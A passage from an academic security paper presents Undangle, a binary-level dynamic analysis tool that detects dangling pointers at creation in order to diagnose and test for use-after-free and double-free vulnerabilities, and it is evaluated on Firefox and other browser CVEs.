“BotHunter: Detecting Malware Infection Through IDS-
Driven Dialog Correlation,” in Proc. USENIX Security Sym-
posium , August 2007.
[62] K. G. Anagnostakis, S. Sidiroglou, P. Akritidis, K. Xin idis,
E. Markatos, and A. D. Keromytis, “Detecting Targeted
Attacks Using Shadow Honeypots,” in Proc. USENIX Security
Symposium , 2005.
[63] N. Provos and T. Holz, Virtual Honeypots: From Botnet
Tracking to Intrusion Detection . Addison Wesley, 2007.
[64] P. Mittal, V . Paxson, R. Sommer, and M. Winterrowd, “Se-
curing Mediated Trace Access Using Black-box Permutation
Analysis,” in Proc. ACM Workshop on Hot Topics in Net-
works , 2009.
[65] V . Paxson, “Strategies for Sound Internet Measurement ,”
inACM SIGCOMM Internet Measurement Conference , Oct.
2004.
[66] N. Fraser, “Neural Network Follies,” http://neil.fra ser.name/
writing/tank, 1998.Undangle: Early Detection of Dangling Pointers in Use-After-Free
and Double-Free Vulnerabilities
Juan Caballero, Gustavo Grieco, Mark Marron, Antonio Nappa
IMDEA Software Institute
Madrid, Spain
{juan.caballero, gustavo.grieco, mark.marron, antonio nappa }@imdea.org
Abstract
Use-after-free vulnerabilities are rapidly growing in pop-
ularity, especially for exploiting web browsers. Use-after-
free (and double-free) vulnerabilities are caused by a pro-
gram operating on a dangling pointer. In this work we pro-
pose early detection , a novel runtime approach for finding
and diagnosing use-after-free and double-free vulnerabil-
ities. While previous work focuses on the creation of the
vulnerability (i.e., the use of a dangling pointer), early
detection shifts the focus to the creation of the dangling
pointer(s) at the root of the vulnerability.
Early detection increases the effectiveness of testing by
identifying unsafe dangling pointers in executions where
they are created but not used. It also accelerates vulnera-
bility analysis and minimizes the risk of incomplete fixes,
by automatically collecting information about all dangling
pointers involved in the vulnerability. We implement our
early detection technique in a tool called Undangle . We
evaluate Undangle for vulnerability analysis on 8 real-
world vulnerabilities. The analysis uncovers that two sep-
arate vulnerabilities in Firefox had a common root cause
and that their patches did not completely fix the under-
lying bug. We also evaluate Undangle for testing on the
Firefox web browser identifying a potential vulnerability.
1 Introduction
A dangling pointer is created when the object a pointer
points-to is deallocated, leaving the pointer pointing to
dead memory, which may be later reallocated or overwrit-
ten. Dangling pointers critically impact program correct-
ness and security because they open the door to use-after-
freeanddouble-free vulnerabilities, two important classes
of vulnerabilities where a program operates on memory
through a dangling pointer.Use-after-free and double-free vulnerabilities are ex-
ploitable [14, 31] and are as dangerous as other, better
known, classes of vulnerabilities such as buffer and in-
teger overflows. Use-after-free vulnerabilities are partic-
ularly insidious: they have been used to launch a num-
ber of zero-day attacks, including the Aurora attack on
Google’s and Adobe’s corporate network [52], and an-
other 3 zero-day attacks on Internet Explorer within the
last year [10, 48, 53].
Our analysis of the publicly disclosed use-after-free and
double-free vulnerabilities in the CVE database [13] re-
veals two disturbing trends illustrated in Figure 1: (1)
the popularity of use-after-free vulnerabilities is rapidly
growing, with their number more than doubling every
year since 2008 (over the same period the total number
of vulnerabilities reported each year has actually been de-
creasing), and (2) use-after-free and double-free vulnera-
bilities abound in web browsers (69%) and operating sys-
tems (21%), which use complex data structures and are
written in languages requiring manual memory manage-
ment (e.g., C/C++).
Use-after-free and double-free vulnerabilities are diffi-
cult to identify and time-consuming to diagnose because
they involve two separate program events that may hap-
pen far apart in time: the creation of the dangling pointer
and its use(dereference or double-free). In addition, un-
derstanding the root cause may require reasoning about
multiple objects in memory. While some dangling point-
ers are created by forgetting to nullify the pointer used to
free an object ( non-sharing bugs), others involve multi-
ple objects sharing an object that is deallocated ( sharing
bugs).
Sharing bugs happen because not all parent objects
know about the child deallocation. They are particularly
problematic for web browsers, which are built from com-
ponents using different memory management methods.
For example, in Firefox, JavaScript objects are garbage-
1
Figure 1: Number of use-after-free (left) and double-free
(right) vulnerabilities reported in the CVE database in
the 2008-2011 period, split by vulnerabilities in browsers,
OSes, and other programs.
collected, XPCOM objects are reference-counted, and the
layout engine uses manual management. This mixture
makes it extremely difficult to reason about objects shared
between code using different memory management meth-
ods, which are particularly susceptible to dangling point-
ers bugs.
Previous work on tools for identifying and diagnosing
use-after-free and double-free vulnerabilities [11, 36, 47]
and on techniques to protect against their exploitation [15,
19, 29, 30, 46] focus on the use of the dangling pointer,
which creates the vulnerability. In this work, we propose
a novel dynamic analysis approach for analyzing and pro-
tecting against use-after-free and double-free vulnerabili-
ties. Our approach shifts the focus from the creation of the
vulnerability (i.e., the dangling pointer use) to the creation
of the dangling pointers at the root of the vulnerability.
We call our approach early detection because it identifies
dangling pointers when they are created, before they are
used by the program. Early detection is useful for differ-
ent applications that target use-after-free and double-free
vulnerabilities. In this work we evaluate early detection
for testing for unsafe dangling pointers and for vulnera-
bility analysis.
Testing for unsafe dangling pointers. A dangling
pointer is unsafe if it is used in at least one program path
andlatent if the program never uses it. Use-after-free and
double-free vulnerabilities are difficult to detect during
testing because in a given execution the unsafe dangling
pointer may not be created or it may be created but not
used. Coverage can be increased using automated input
generation techniques [26, 33, 41]. However, if the input
space is large it can take long a time to find an input that
creates the dangling pointer and triggers the vulnerabil-ity. Early detection extends the effectiveness of testing
by also detecting unsafe dangling pointers in executions
where they are created but not used. To identify at runtime
unsafe dangling pointers and minimize false positives, we
use the intuition that long-lived dangling pointers are typ-
ically unsafe. Moreover, long-lived dangling pointers are
always dangerous and should be removed, even if cur-
rently not used, because modifications to the code by the
(unaware) programmer may result in new code paths that
use the (dangling) pointer. To identify long-lived dangling
pointers, early detection tracks the created dangling point-
ers through time, flagging only those dangling pointers
that are still alive after a predefined window of time.
Vulnerability analysis. A common debugging task is,
given an input that causes a crash or exploitation, deter-
mining how to best patch the vulnerability, which requires
understanding the vulnerability type and its root cause.
Such crashing inputs are typically found using automatic
testing techniques [26, 33, 41] and are usually included in
vulnerability disclosures to program vendors. Our early
detection technique automatically determines if a crash is
caused by a use-after-free or double-free vulnerability and
collects diagnosis information about the program state at
both creation and use time. State-of-the-art memory de-
bugging tools [11, 36, 47] provide information about the
program state when the dangling pointer is used, but pro-
vide scant information about the dangling pointer creation
(limited to the deallocation that caused it, if at all). This
is problematic because a patch needs to completely elim-
inate the dangling pointer. If a patch only prevents the
dangling pointer use that causes the crash, it may be in-
complete since a dangling pointer may be used at different
program points and there may be multiple dangling point-
ers created in the same bug. Furthermore, current tools
offer little help when debugging sharing bugs, as these
bugs require reasoning about multiple objects that point
to the deallocated object at creation time. Our early de-
tection technique tracks all pointers that point-to a buffer,
automatically identifying all dangling pointers to the deal-
located buffer, not only the one that produces the crash.
Thus, it offers a complete picture about the type of dan-
gling pointer bug and its root cause.
We implement our early detection technique in a tool
called Undangle that works on binary programs and does
not require access to the program’s source code. How-
ever, if program symbols are available, the results are aug-
mented with the symbol information.
We evaluate Undangle for vulnerability analysis and
testing for unsafe dangling pointers. First, we use it to
diagnose 8 vulnerabilities in real-world programs includ-
ing four popular web browser families (IE7, IE8, Firefox,
Safari) and the Apache web server. Undangle produces
no false negatives and uncovers that two use-after-free
vulnerabilities in Firefox were caused by the same dan-
gling pointer bug. The reporter of the vulnerabilities and
the programmers that fixed them missed this, leaving the
patched versions vulnerable to variants of the attacks. We
identify this issue with no prior knowledge of the Firefox
code base, which shows the value of early detection for
diagnosing the root cause of the vulnerability.
Then, we test two recent Firefox versions for unsafe
dangling pointers. Early detection identifies 6 unique dan-
gling pointer bugs. One of them is potentially unsafe and
we have submitted it to the Mozilla bug tracker. Our dis-
closure has been accepted as a bug and is pending confir-
mation on whether it is exploitable. Two other bugs are
in a Windows library, so we cannot determine if they are
unsafe or latent. The other three bugs are likely latent but
our results show that the diagnosis information output by
Undangle makes it so easy to understand and fix them,
that they should be fixed anyway to close any potential
security issues.
This paper makes the following contributions:
•We propose early detection, a novel approach for
finding and diagnosing use-after-free and double-
free vulnerabilities. Early detection shifts the focus
from the creation of the vulnerability to the creation
of the dangling pointers at the root of the vulnerabil-
ity.
•We have designed an early detection technique that
identifies dangling pointers when they are created.
It uncovers unsafe dangling pointers in executions
where they are created but not used, increasing the
effectiveness of testing. When diagnosing a crash
caused by a dangling pointer, it collects extensive di-
agnosis information about the dangling pointer cre-
ation and its use, enabling efficient vulnerability
analysis.
•We have implemented our early detection technique
into a tool called Undangle that works directly on bi-
nary programs. We have evaluated Undangle for vul-
nerability analysis using 8 real-world vulnerabilities
and for testing on two recent versions of the Firefox
web browser.
2 Problem Overview
Dangling pointers are at the root of use-after-free and
double-free vulnerabilities. Both classes of errors involve
two events that may happen far apart in time: the creation
Figure 2: Dangling pointer lifetime.
of the dangling pointer and its use. We illustrate them
in Figure 2. First, the program creates one or more dan-
gling pointers by deallocating a memory object (Object 1
attcreate ). The dangling pointers live until they are de-
stroyed by modifying their value (set to NULL at tdestroy
in Figure 2) or deallocating the memory where they are
stored. If the program uses a dangling pointer before de-
stroying it (dereferenced or double-freed at tuse), it oper-
ates on unknown content since the memory pointed-to is
dead and may have been re-allocated to a different object
(Object 2 at tmemreuse ).
A use-after-free vulnerability happens when the pro-
gram dereferences a dangling pointer. An attacker can ex-
ploit a use-after-free vulnerability for reading secret val-
ues, overwriting sensitive data, and for control-flow hi-
jacking. A common hijacking technique is to heap spray
malicious content to overwrite a function pointer or an ob-
ject’s virtual table address in the range pointed-to by the
dangling pointer [14]. A double-free vulnerability hap-
pens when the program passes a dangling pointer as a pa-
rameter to a deallocation, freeing the (already free) mem-
ory range it points-to. This may corrupt the internal heap
metadata enabling an attacker to exploit the program [31].
In the remainder of this section we detail early detec-
tion for identifying unsafe dangling pointers (Section 2.1)
and for vulnerability analysis (Section 2.2); provide use-
ful definitions (Section 2.3); and present an architectural
overview of Undangle (Section 2.4).
2.1 Identifying Unsafe Dangling Pointers
Determining that a dangling pointer is never used (i.e., it
is latent) requires a precise points-to and reachability anal-
ysis along all inter-procedural paths between creation and
destruction. Such detection on large programs like web
browsers is beyond state-of-the-art static analysis tools.
Instead, current runtime tools determine that a dangling
pointer is unsafe if it happens to be used in an execution.
This late detection prevents the identification of dangling
pointers that are created but not used in the monitored ex-
ecution.
To identify unsafe dangling pointers at runtime, even
if they are not used, we utilize the intuition that long-
lived dangling pointers are likely to be unsafe. Even
when only latent, they should be removed because later
modifications to the code may make them unsafe. On
the other hand, short-lived dangling pointers may have
been introduced during compilation, or left temporarily
dangling by the programmer. For example, a program-
mer should always nullify the pointer passed to a deal-
location after the deallocation returns ( free(aptr);
aptr=NULL; ). This correct behavior still produces
some transient dangling pointers because at the binary
level aptr is copied into the stack before calling the
deallocation function. Right after the deallocation returns,
there are at least two dangling pointers: the parameter in
the stack and aptr . However, both will be destroyed in
the next few instructions and thus, are not unsafe. The
programmer may also introduce transient dangling point-
ers. For example, when destroying a tree structure, a pro-
grammer may create a dangling pointer by deallocating a
child node before its parent node, but the dangling pointer
is soon destroyed when the parent node is deallocated.
Safety window. To determine when a dangling pointer
becomes unsafe, our early detection technique takes as
input the size of a safety window , given as a number of
instructions executed. The safety window size captures
when we believe a dangling pointer is no longer short-
lived and should be considered unsafe. When a dangling
pointer is created, a callback is set for the time of creation
plus the safety window size. If the dangling pointer is
still alive when the callback triggers, it is flagged as un-
safe. Dangling pointers used by the program are flagged
regardless if their callback has triggered. Time is mea-
sured independently for each thread using a per-thread in-
struction counter. This way, if a thread creates a dangling
pointer and goes to sleep, time freezes for that thread.
The size of the safety window varies depending on the
application. For testing, we set the safety window to a
small positive value to allow the program to destroy short-
lived dangling pointers. We evaluate safety window size
selection for testing in Section 4.3, selecting a size of
5,000 instructions.
Coverage. To find unsafe dangling pointers many pro-
gram paths need to be explored. Our early detection tech-
nique requires an external tool to produce inputs that tra-
verse different paths in the program. We run the program
on the inputs produced by the input generation tool, and
apply early detection to each execution. Currently, we
use the bf3 (Browser Fuzzer 3) [1] tool to generate in-
puts, but many other tools exist that could be used in-
stead [24, 26, 33, 41].Output information. When a dangling pointer is used or
becomes unsafe, early detection outputs detailed informa-
tion on the program state when the dangling pointer was
created and when the dangling pointer was used or be-
came unsafe. This diagnosis information includes: if the
dangling pointer was used or flagged as unsafe; if used,
the vulnerability type (use-after-free or double-free); a
description of the deallocated buffer (e.g., address, size,
callsite); which thread deallocated the object and which
thread used it; the program callstack; the list of dangling
pointers alive; and information about the buffers storing
the dangling pointers. We detail the output information in
Section 3.3.
2.2 Vulnerability Analysis
While not as general as existing memory debugging
tools that detect a wider range of errors [11, 12, 36, 47],
Undangle can be used as a specialized diagnosis tool
for use-after-free and double-free vulnerabilities Undan-
gle detects all dangling pointer uses, similar to Electric
Fence [47] and PageHeap [12], which use a new page for
each allocation and rely on page protection mechanisms to
detect dangling pointer uses. This is better than popular
memory debugging tools such as Valgrind [11] and Pu-
rify [36], which check if a dereferenced pointer points-to
live memory, missing dangling pointers that, when deref-
erenced, point to an object that has reused the memory
range (tuse≥tmemreuse in Figure 2).
The main advantage of using Undangle for vulnerabil-
ity analysis is that if the crash/exploit is due to a use-after-
free or double-free vulnerability, Undangle automatically
collects more information about the root cause of the vul-
nerability than any existing tool. Detailed diagnosis in-
formation can be collected because Undangle detects the
dangling pointers at creation and tracks them until they
are used. Detailed diagnosis information accelerates vul-
nerability analysis and minimizes the risk of incomplete
fixes [35]. To use Undangle for vulnerability analysis we
configure it with an infinite safety window size, so that
dangling pointers are only flagged when they are used by
the program. Undangle offers the following benefits for
vulnerability analysis:
•It automatically identifies the dangling pointer cre-
ation and outputs detailed information (described in
the previous section) about the program state at that
time. In comparison, current tools will at most flag
which deallocation created the dangling pointer used
in the vulnerability (if at all). The analyst still needs
to rerun the program in a debugger to obtain in-
formation about the program state at creation time,
Figure 3: Classes of dangling pointer bugs. The dashed
object is deallocated creating the dangling pointers.
which may differ in another execution due to non-
determinism in the program (particularly wrt. mem-
ory allocator behavior).
•It automatically identifies not only the dangling
pointer that causes the crash, but also all other dan-
gling pointers that point-to the deallocated buffer at
creation time, as well as the memory objects where
they are stored. This is fundamental to reason about
sharing bugs, where multiple parent objects hold
pointers to the deallocated child object. Sharing bugs
are most complex to understand and their fix is not
as simple as nullifying the offending pointer, since
all parents need to have a way of determining if the
child was deallocated. Identifying all dangling point-
ers created by deallocating a buffer is also fundamen-
tal to minimize the risk that a patch is incomplete,
since those dangling pointers be also be unsafe.
2.3 Definitions
We define a pointer to be a pair comprising: its store ad-
dress , i.e., the lowest memory address where the pointer is
stored, and its points-to address , i.e., the pointer’s value.
A dangling pointer is a special type of pointer. A pointer
becomes a dangling pointer when the object it points-to is
deallocated, leaving the pointer pointing to dead memory.
In this work, we focus on temporal errors rather than spa-
tial ones. Thus, pointers that point outside their expected
memory buffer (e.g., due to incorrect pointer arithmetic
or a buffer overflow) are not considered to be dangling
pointers, even if they end up pointing to dead memory.
Store address. A dangling pointer is always stored in live
(allocated) memory or in a register. It may be stored any-
where in live memory: in live heap, in the current stack,
in memory-mapped files (e.g., loaded using mmap ), or
in the data segment of any of the modules loaded in the
program’s address space. If the memory range contain-
ing its store address is deallocated (i.e., freed, unmapped,
popped out of the stack), the dangling pointer is destroyed.
Figure 4: Architecture Overview. Gray boxes were previ-
ously available.
Points-to address. By definition, a dangling pointer
points-to deallocated memory at creation. Later in its life-
time, it may point to a different object that resuses the
memory vacated by the object the dangling pointer was
meant to point-to. Although, strictly speaking, at this time
the pointer is no longer “dangling”, we consider it a dan-
gling pointer until it is destroyed. In addition, any pointer
derived from a dangling pointer, e.g., by copying the dan-
gling pointer or using pointer arithmetic on the dangling
pointer, is also a dangling pointer. Dangling pointers can
point to any memory region that can be deallocated, (i.e.,
heap, stack, mapped files). The large majority of use-
after-free and all double-free vulnerabilities in the CVE
database are caused by dangling pointers created by free-
ing heap memory. However, we found (and include in our
evaluation) a use-after-free vulnerability in Apache where
the dangling pointers are created by unmapping a library
from the program’s address space. Although possible, we
have not found any vulnerabilities in the CVE database
where a dangling pointer pointed to dead stack.
Dangling pointer bugs. We call a deallocation that
creates at least one unsafe dangling pointer a dangling
pointer bug . We differentiate between two classes of dan-
gling pointer bugs, depicted in Figure 3. In the non-
sharing bug (left subfigure) the same object contains the
pointer used to deallocate the object (freer) and the un-
safe dangling pointer (user). In the sharing bug (right
subfigure) these two pointers are stored in different ob-
jects. A key difference is that a sharing bug indicates
some lack of coordination: the object left with an unsafe
dangling pointer does not know that the deallocation hap-
pened. Since coordination may be required from object
types that may be spread across multiple method invo-
cations and program modules, sharing bugs are typically
harder to identify and fix than non-sharing ones. Among
the real-world vulnerabilities we analyze in Section 4.1,
we observed sharing and non-sharing bugs to be equally
likely.
2.4 Architecture Overview
Early detection works on an execution of a program. It
can be run online in parallel with the program execution
or offline on a trace of the execution. Our Undangle tool
works offline.
Figure 4 shows the architectural overview of Undan-
gle. First, the program is executed on the given input in-
side a previously available execution monitor . The execu-
tion monitor is a plugin for the TEMU dynamic analysis
platform [2], which is implemented on top of the QEMU
open-source whole-system emulator [3]. The execution
monitor runs any PE/ELF program binary on an unmod-
ified guest operating system (x86 Windows or Linux) in-
side another host operating system (Linux on x86).
The execution monitor tracks the program execution
and produces an execution trace, containing all exe-
cuted instructions and the contents of each instruction’s
operands. In addition, it produces an allocation log with
information about the allocation/deallocation operations
(heap and memory-mapped files) invoked by the program
during the run. For this, the execution monitor supports
close to a hundred standard memory functions. We as-
sume that the programmer provides information on any
custom memory functions used by the program.
The execution trace and the allocation log are inputs to
the early detection technique, which comprises three mod-
ules. The core of early detection is the dangling detection
module, which detects the creation of dangling pointers,
tracks their propagation until their safety window expires,
monitors for dangling pointer uses, and outputs the infor-
mation about the dangling pointer creation and the detec-
tion/use. To track the dangling pointers it leverages the
pointer tracking module, whose goal is to output at any
point during an execution where pointers are stored as
well as their values. In turn, the pointer tracking module
leverages a generic taint tracking module extended with
a reverse map to identify which program locations have
been derived from the same taint label. All three modules
have been developed for this work. In addition, early de-
tection leverages a previously available callstack tracking
module [21].
We have also developed a symbol reader , which takes
as input the program symbols (if available) and merges the
symbol information into the output of the dangling detec-
tion module. Symbol information significantly improves
the diagnosis of dangling pointer bugs by providing de-
tailed callstack information, mappings from binary code
to lines in the source code, and type information.
Implementation. We have implemented early detection
in approximately 4,000 lines of Objective Caml code. The
symbol reader module comprises an additional 1,000 linesof Objective Caml code and 1,000 lines of scripts. The
execution monitor and the callstack tracking module were
previously available.
3 Early Detection
This section details our early detection technique, which
tracks dangling pointers until they are used, become un-
safe, or are destroyed. Our technique is implemented as a
stack of 3 modules, which we describe bottom-up in this
section. First we briefly introduce the taint tracker mod-
ule in Section 3.1, then we describe the pointer tracking
module in Section 3.2, and finally the dangling detection
module in Section 3.3.
3.1 Taint Tracking
Taint tracking [27, 28, 45, 50] is a widely used technique
and we assume the reader is familiar with the basic con-
cept. However, our taint tracking module includes an im-
portant addition. Previous taint tracking techniques are
based on a forward map from program locations (i.e.,
bytes or words in memory and registers) to the set of taint
labels assigned to the location1. Our taint tracking mod-
ule implements an additional reverse map that associates
a taint label with the set of all program locations that have
that taint label in their taint set. The reverse map is up-
dated simultaneously with the forward map to maintain
synchronization. It enables fast lookup of all program
state derived from some taint label, avoiding a scan of
the forward map in exchange for some small processing
during propagation. In early detection, the reverse map is
used to quickly identify all dangling pointers pointing to
a memory buffer when it is deallocated.
Our taint tracking module has been designed so that it
can be used to implement different flavors of taint track-
ing. The generality is achieved by making the taint track-
ing module a polymorphic virtual class. Each applica-
tion can instantiate it with their own taint label type, their
ownpropagate method (implementing the taint prop-
agation rules), and their own taint sources and sinks. The
taint tracking module simply provides methods to oper-
ate on the forward and reverse maps. In early detection
all properties of the taint tracking module are set by the
pointer tracking module.
1In early approaches, the taint label was one bit and only one label
was kept per location, but currently this varies with the application.
Figure 5: Lattice
of pointer types.type taint_label = {
type : Ptr | Dangling
root-type: HeapRoot |
StackRoot |
[...] |
Pseudo-root
root-addr : int64;
icounter : int64;
offset : int;
}
Figure 6: Pointer taint label.
3.2 Pointer Tracking
The pointer tracking module tracks throughout the exe-
cution where the pointers are stored and their values. It
monitors how new pointers are derived by copying an ex-
isting pointer and by computing a new pointer from an ex-
isting one using pointer arithmetic. It also identifies root
pointers that are not derived from any other pointers.
Comparison with prior work. Our pointer tracking
module can be seen as a specialized type inference mod-
ule with the simple type lattice in Figure 5. The reason we
could not use more general type inference modules such
as Rewards [40] and TIE [39] was that we need to be able
to identify the (dangling) pointers at any point in the ex-
ecution, e.g., to check in each instruction if a dangling
pointer is being used. This requires a forward technique
that identifies pointers as the execution progresses. With
TIE we would have to solve a constraint system at each
instruction (too expensive), and with Rewards we could
miss pointers that have not yet been dereferenced. Our
pointer tracking module uses a forward pointer inference
technique based on taint tracking.
Overview. The pointer tracking module uses the taint in-
formation to mark which program locations store pointers.
In addition, it tracks the current pointer value in a separate
value map . At each instruction the pointer tracker checks
if new root pointers, not derived from other pointers,
are introduced and whether the instruction creates new
pointers by copying or using pointer arithmetic. When
a root pointer is found, the locations where the pointer
is stored are tainted using the label shown in Figure 6,
where the root-type androot-addr fields repre-
sent the kind and value of the root pointer respectively,
theicounter field describes the instruction counter in
the execution trace where the root was introduced, and the
offset field captures the offset of this byte in the pointer
(e.g., 0 for the least significant byte of a pointer and 3
for the most significant byte of a 32-bit pointer). Whennew pointers are derived, the taint (pointer) information
from the source operands is propagated to the destina-
tion operands2. Since the taint label stores a root pointer
value, at any point the reverse map can be used to iden-
tify all pointers derived from a root pointer. To minimize
memory use, locations that no longer hold pointers are re-
moved from the forward map (i.e., untainted) rather than
setting their type to top.
Root pointers. Each memory buffer has an associated
set of root pointers (often only one) from which all point-
ers to the buffer are derived. For a heap buffer, its root
pointer is stored in the return value of the heap allocation
function. The location of the return value (often the EAX
register) is stored in the allocation log produced by the
execution monitor. For the parameters and local variables
in a function’s stack frame, the root pointer is the stack
pointer (stored in the ESP register) at the function’s entry
point. To identify function entry points we use a callstack
tracking module developed in prior work [21]. For stat-
ically allocated buffers, root pointers are global pointers,
which we identify using debugging symbols and reloca-
tion tables, if available3.
To identify global pointers when no symbol informa-
tion or relocation tables are available, at each instruc-
tion the pointer tracking module identifies pointers being
dereferenced. If a pointer being dereferenced is not yet
tainted, it means that no root pointer is known for it, so
the pointer tracker taints it setting the root type to pseudo-
root and the root address to its current value.
Value tracking. The taint information marks which pro-
gram locations store pointers, but it does not capture the
current pointer value, which the tracker may need to out-
put at any execution point. In an online setting, the pointer
value can be simply obtained by reading the memory that
stores the pointer. However, when operating on execution
traces this value needs to be tracked and two challenges
need to be addressed: our traces only contain the value
of the instruction’s operands before the instruction is ex-
ecuted and they only contain user-level instructions. To
address the first issue, the pointer tracking module emu-
lates the small set of x86 instructions used to derive new
pointers (Table 1) to obtain the value of the destination
operands after the instruction has executed. This emula-
tion also identifies underflow and overflow in addition and
subtraction, needed by some propagation rules (explained
next).
2Instructions like xchg (exchange) have multiple destination
operands
3PE executables (EXE files) running on a 32-bit Windows OS do not
need relocation tables. They are the first module loaded into the virtual
address space and are loaded at their preferred address.
Table 1: The x86 instructions that propagate pointers,
their abstraction, and the associated propagation rules.
Instructions Abstraction Rules
mov, movs, dst←src move
push, pop
xchg t←src;src←dst;dst←t exchange
add dst←src1+src2 add ,default
inc srcdst←srcdst + 1 nop ,default
sub dst←src1−src2 sub ,default
dec srcdst←srcdst−1 nop ,default
lea dst←(disp +index ) +base add ,default
nop*4- nop
All other dst←⊤ default
The lack of kernel instructions means that a register or
memory range, that when passed to the kernel contains a
pointer, may no longer contain a pointer when the kernel
returns execution to user-level. To address the second is-
sue, when a user-level instruction reads a tainted operand,
the tracker compares the value of the operand in the trace
with the tracked pointer value. If they are not equal, the
operand’s taint is cleared to indicate that the value has
changed unexpectedly and it is unlikely that it still holds a
pointer. This is a conservative approach because the value
returned by the kernel could be different but still a pointer.
In those cases, if the returned pointer is dereferenced later
in the execution the tracker will mark it as a pointer again.
Pointer propagation rules. At each instruction in the
execution, pointer propagation rules are applied to iden-
tify new pointers being created by copying existing point-
ers or as a result of pointer arithmetic. Table 1 describes
the mapping between x86 instructions that could produce
a new pointer and the specific pointer propagation rules
that the instruction may trigger. There are five classes of
rules. The move rule which copies (parts of) a pointer; the
exchange rule; the pointer arithmetic rules add,sub ;
thenop rule, which leaves the taint information as it is;
and the default rule, which removes any pointers in the
operands written by the instruction.
A fundamental difference between the move rule and
the arithmetic rules is that pointer arithmetic has to be per-
formed using the complete pointer, while a program can
move or copy pointers completely or in chunks. For exam-
ple, a program could copy a 32-bit pointer byte-a-byte us-
ing four instructions that write to consecutive memory lo-
cations and the 4 destination bytes would still represent a
pointer. Such unaligned copies happen often in functions
that copy memory, e.g., memcpy . Thus, the move prop-
4nop* represents instructions of different lengths that a compiler can
use as no-operation instructions, as well as some instructions whose only
side-effect is setting the eflags register, such as or %eax,%eax .agation rule operates on program locations (i.e., bytes),
while the arithmetic propagation rules operate on instruc-
tion operands.
Arithmetic instructions need two propagation rules to
differentiate between valid and invalid pointer arithmetic.
We consider only two valid pointer arithmetic operations
that return a new pointer: adding an offset to a pointer
without overflow, and subtracting an offset from a pointer
without underflow. All other arithmetic operations on a
pointer (e.g., adding two pointers or subtracting two point-
ers) are invalid and do not return a pointer. Invalid pointer
arithmetic operations trigger the default rule.
3.3 Dangling Detection
The dangling detection module is responsible for iden-
tifying the creation of dangling pointers, detecting dan-
gling pointers when the safety window elapses, detecting
any use of a dangling pointer that may happen before the
safety window elapses, and outputting diagnosis informa-
tion for the detected dangling pointers.
Dangling pointers may be created and destroyed every
time memory is deallocated. The dangling pointer mod-
ule uses the allocation log, output by the execution mon-
itor, to identify when heap memory is freed and files are
unmapped, and the callstack tracker to identify when a
stack deallocation happens (i.e., the stack pointer is incre-
mented). For each deallocation, the dangling detection
module first destroys any pointers stored in the deallo-
cated memory. Then, for each heap deallocation and file
unmapping it detects dangling pointers to the deallocated
buffer. For efficiency, it does not detect dangling pointers
to deallocated stack by default, since we did not find such
vulnerabilities in the CVE database.
Dangling pointers are identified by querying the reverse
map to obtain the list of all pointers in the program’s state
derived from the root pointers for the buffer. If the list is
not empty it sets the type of those pointers to dangling.
Then, it sets a detection callback for the current times-
tamp plus the size of the safety window, and stores the list
of dangling pointers created, the buffer information, and
the current callstack. For vulnerability analysis, the safety
window size is set to infinite, and for testing it defaults to
5,000 instructions. We evaluate safety window size selec-
tion for testing in Section 4.3.
The pointer tracking module tracks dangling pointers
between creation and detection the same way as non-
dangling pointers. At each instruction, the dangling de-
tection module checks if any detection callback has ex-
pired. If so, it uses the reverse map to obtain the list of
dangling pointers that are still alive. Most dangling point-
ers are short-lived and will be destroyed by the time the
safety window expires. If any dangling pointer is still
alive they are flagged and diagnosis information is output.
Note that new dangling pointers introduced between cre-
ation and detection are also detected because the pointer
tracking module considers any pointer derived from a dan-
gling pointer to be also a dangling pointer.
Dangling pointers in memory metadata. The meta-
data used by memory management functions may include
lookaside data structures that store pointers to deallocated
buffers for fast reuse. If the lookaside structures are stored
in live memory then the pointers they store may be flagged
as dangling pointers. To avoid this, the dangling detec-
tion module deactivates pointer propagation inside mem-
ory management functions. We assume the allocation log
contains all memory allocation/deallocation invocations
by the program including custom allocators.
Dangling pointer uses. It could happen that the safety
window size is set too large and a dangling pointer is
used before detection. To avoid missing those dangling
pointers, the dangling detection module checks if the cur-
rent instruction dereferences or double-frees a dangling
pointer. For this, it queries the pointer tracking module to
determine if any memory addressing operand used by the
instruction stores a dangling pointer. If the instruction is
the entry point of a deallocation function, it also checks if
the address parameter is a dangling pointer. Any dangling
pointer used is flagged.
Contextual information. For each dangling pointer used
or flagged as unsafe, the following diagnosis information
is output to assist in the analysis: (1) whether it is a use or
an expiration of the safety window; (2) if a use, whether
it is a use-after-free or double-free vulnerability; (3) a
description of the deallocated buffer (e.g., address, size,
callsite, deallocation timestamp); (4) the identifier for the
thread that created the dangling pointers (i.e., invoked the
deallocation) and if used, for the thread that used the dan-
gling pointer; (5) the callstack at creation time and if used,
at use time; (6) the list of dangling pointers created by this
deallocation; (7) the list of dangling pointers created by
this deallocation and still alive at detection/use; and (8)
the memory region containing each dangling pointer in
the previous two items (register, heap buffer, stack frame,
module). If program symbols are available, they are used
to enhance the callstack and to obtain type information
for the heap objects. For the latter, the object alloca-
tion/deallocation site is mapped to a source file and line
number and the allocation type at that line in the source
code is obtained.Table 2: Vulnerabilities used in the evaluation.
Name Program Vuln. CVE Type
apache Apache 2.2.14 mod isapi 2010-0425 uaf-m
aurora Internet Explorer 7.0.5 2010-0249 uaf-h
firefox1 Firefox 3.6.16 2011-0065 uaf-h
firefox2 Firefox 3.6.16 2011-0070 dfree
firefox3 Firefox 3.5.1 2011-0073 uaf-h
ie8 Internet Explorer 8.0.6 2011-1260 uaf-h
safari Safari 4.0.5 2010-1939 uaf-h
ie7-uf Internet Explorer 7.0.5 2010-3962 uf
4 Evaluation
In this section we evaluate our early detection approach.
The evaluation comprises two parts. First, we evaluate
Undangle for vulnerability analysis. We apply Undangle
to diagnose 8 vulnerabilities (Section 4.1) and detail two
of those vulnerabilities in a case study (Section 4.2). The
vulnerability diagnosis results show that Undangle pro-
duces no false negatives and that it enables us to under-
stand the common root cause of two use-after-free vulner-
abilities in Firefox, which was missed by the reporter of
the vulnerabilities and the programmers that fixed them,
leaving the program vulnerable to variants of the reported
attacks.
Then, we evaluate Undangle for testing on two recent
versions of Firefox (Section 4.3). Undangle flags 6 unique
dangling pointer bugs: one which we believe is unsafe,
two in Windows libraries where we cannot determine if
they are unsafe or latent, and three that we believe are
only latent. The results show that the false positive rate
is low and that the output diagnosis information makes it
easy to understand and fix the bugs.
Vulnerabilities. Table 2 shows the 8 vulnerabilities we
use to evaluate Undangle for vulnerability analysis. These
8 vulnerabilities were selected because all of them have an
exploit available in public databases5[4]. One of them,
theaurora vulnerability, was exploited in a high profile
attack on Google’s and Adobe’s corporate network [52].
Seven of the vulnerabilities are in popular web browsers.
The remaining one is in the modisapi module of the
